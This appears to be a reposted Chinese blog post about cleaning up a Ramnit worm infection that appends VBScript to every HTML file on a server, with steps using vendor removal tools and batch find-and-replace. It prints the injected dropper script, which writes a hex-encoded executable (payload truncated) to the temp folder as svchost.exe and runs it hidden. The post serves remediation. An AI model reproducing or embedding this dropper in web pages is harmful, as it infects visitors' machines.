HTML 感染 DropFileName = 「svchost.exe」 Ramnit 蠕蟲病毒 查殺解決辦法

參考：

https://www.cnblogs.com/wuhairui/p/8297614.html
http://www.guopingblog.com/post/100.html

 

最近發現vps流量瘋長 看了下統計 也沒看到網站有大流量，查看源碼才發現網頁被添加了一段很長的js 內容大概是這樣

 

 <SCRIPT  Language=VBScript>

 DropFileName = 「svchost.exe」

 WriteData =

 「4D5A0000200000000400000F00FFF.............................................此處省略N個字符串」

 Set FSO = CreateObject("Scripting.FileSystemObject")
 DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
 If FSO.FileExists(DropPath)=False Then
 Set FileObj = FSO.CreateTextFile(DropPath, True)
 For i = 1 To Len(WriteData) Step 2
 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
 Next
 FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
 //--></SCRIPT>

 

到vps一看才發現 全部的 html 文件末尾都被加了一段這個代碼把頁面體積搞的很大 從而致使流量飆升，百度了一夜沒搞明白，次日又搞了一天試過360殺毒根本沒啥用，最後用賽門鐵克的  Ramnit 蠕蟲病毒 專殺工具給搞定了。下面說下解決方案

 

一、下載    賽門鐵克的  Ramnit 蠕蟲病毒 專殺工具

下載地址：https://www.symantec.com/security_response/writeup.jsp?docid=2015-022415-4725-99

下載後直接運行 點 star 便可 全盤刪完後會提示重啓 點 yes 重啓便可。

 

二、用專殺工具殺完之後隨機檢查了幾個 html 文件發現還有那段代碼，不過不會像以前本身手動刪了 而後裏面就又被自動加上了，這說明病毒已經被殺掉了多是文件太多，專殺工具沒有全都檢測獲得，不過不要緊能夠用批量查找替換工具 ultrareplace 把網站從新查找替換一下便可。

 

ultrareplace 下載地址：http://www.xiazaiba.com/html/4475.html

 

目前看上去是問題解決了，還需再觀察幾天，儘可能不要在服務器下載運行來歷不明的軟件，及時打補丁安裝防禦工具。

 

 

---

 

 

首先表示強烈譴責，沒事寫出這種木馬來。致使開發者把時間花在解決這種問題上。

這種木馬會在你全盤的html文件的最底部生成一堆vbscript代碼，致使html文件變得很大。大概213kb。能夠看出他就是在惡搞。

如圖：

你寫好的html，過段時間就變成這樣了。前端開發表示簡直心態爆炸。

 

解決方案：

 

1.至如下連接處下載ATTK掃描工具： http://support.trendmicro.com.cn ... stomizedpackage.exe (32位） http://support.trendmicro.com.cn ... mizedpackage_64.exe（64位） 2.將下載的工具(supportcustomizedpackage)放到有問題的電腦上，雙擊運行 3.在打開的界面中手動設定掃描全盤文件

運行：

全盤掃描：

 

 

轉：https://bbs.kafan.cn/thread-1830286-1-1.html